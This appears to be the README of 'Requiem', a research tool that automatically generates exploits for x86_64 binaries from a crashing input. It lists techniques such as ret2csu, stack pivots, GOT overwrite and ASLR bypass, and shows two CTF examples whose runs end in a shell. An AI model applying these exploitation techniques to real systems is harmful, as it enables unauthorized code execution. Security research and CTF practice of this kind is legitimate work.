Modularized exploit generation framework for x86_64 binaries
Overview
This project is still at early stage of development, so you might want to come back later...
Requiem is a modularized exploit generator for x86_64 binaries which emulates the target program with Qiling, and uses the user-provided PoC as the target program's input. During the target program's execution, Requiem monitors its I/O-related behaviors and employs taint analysis to collect information that can be later used for exploitation.
To use Requiem, a PoC must be provided because Requiem cannot perform symbolic execution. The target program will follow the execution path formed by the PoC, and when the target program reaches the crash state, Requiem will determine whether the crash state is exploitable by checking if RIP has been tainted.
If RIP has been tainted at the crash state, Requiem will generate an exploit which:
- guides the target program to the exploitable state
- exploits the program based on the strategy specified by the user.
Modularized?
Def: An exploitation "strategy" consists of a list of exploitation "techniques".
The idea is to implement some well-known exploitation techniqes as reusable and configurable "modules". The user can use the built-in techniques to exploit a x86_64 binary, or write a custom strategy/techniques to deal with Ad-hoc problems.
Implemented Techniques
- ret2win (return to an arbitrary function specified by the user)
- ret2csu (handling of different variants of __libc_csu_init is not implemented yet)
- basic stack pivot (
read(0, bss+n, 1024),pop rbp ; ret,leave ret) - advanced stack pivot (requires at least one call site of
read()) - GOT partial overwrite (overwrite LSB of [email protected] to acquire
syscall, thensys_execve("/bin/sh", 0, 0)) - mprotect + shellcode
- ret2dlresolve
- simple ASLR bypass (leak PIE/libc base addresses using available read primitives)
- advanced ASLR bypass (leak PIE/libc base addresses with _IO_file_write when there are no read primitives)
- ...
Implemented PoC Types
- stdin
- file
- socket
- ...
Dependencies
Installation
git clone https://github.com/aesophor/requiem
cd requiem
git submodule update --init --recursive
Examples
1. pwnable.tw: unexploitable (500 PTS)
The original challenge is on pwnable.kr and it is solvable.
This time we fix the vulnerability and now we promise that the service is unexploitable.
source
#include <stdio.h>
#include <unistd.h>
int main() {
sleep(3);
char buf[4];
read(0, buf, 256);
}
checksec
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
result
$ ./requiem.py 'examples/unexploitable/unexploitable' 'examples/unexploitable/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>
(skipped a few lines)
[x] Error: PC(0x4141414141414141) Unreachable
[x] RIP tainted. Generating exploit...
[=] Generating exploit...
[=] Deduced offset: 4 bytes
write primitives: [[4198745, 140737488412076, 256]]
write primitives: [[4198745, 140737488412076, 256]]
[=] Generated exploit: examples/unexploitable/unexploitable_exploit.py
[=] Executing exploit: examples/unexploitable/unexploitable_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/unexploitable/unexploitable': pid 402588
[*] Switching to interactive mode
$ ls
README.md examples libs requiem requiem.py
$
2. CS 2017 Fall: readme
The length of stack-buffer overflow is very limited.
Only the saved RBP and the return address is controllable by the attacker.
source
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char buf[0x20];
setvbuf(stdout, 0, _IONBF, 0);
printf("overflow me:");
read(0, buf, 0x30);
}
checksec
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
result
$ ./requiem.py 'examples/readme/readme' 'examples/readme/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>
(skipped a few lines)
[x] Error: PC(0x4141414141414141) Unreachable
[x] RIP tainted. Generating exploit...
[=] Generating exploit...
[=] Deduced offset: 32 bytes
write primitives: [[4198801, 140737488412064, 48]]
write primitives: [[4198801, 140737488412064, 48]]
[=] Generated exploit: examples/readme/readme_exploit.py
[=] Executing exploit: examples/readme/readme_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/readme/readme': pid 402513
[*] Switching to interactive mode
overflow me:$ ls
README.md examples libs requiem requiem.py
$
635 Dec 20, 2022
1 Oct 24, 2021
12 Dec 30, 2022
56 Jul 31, 2022
57 Dec 16, 2022
588 Jan 09, 2023
1 Jan 02, 2022
1.1k Aug 24, 2021
1 Apr 07, 2022
48 Jun 20, 2022
1 Jan 24, 2022
1 Sep 21, 2022
414 Jan 02, 2023
1k Dec 09, 2022
3 Sep 26, 2022
1 Oct 22, 2021
4.9k Jan 08, 2023
2 Oct 08, 2022
204 Dec 13, 2022
146 Dec 31, 2022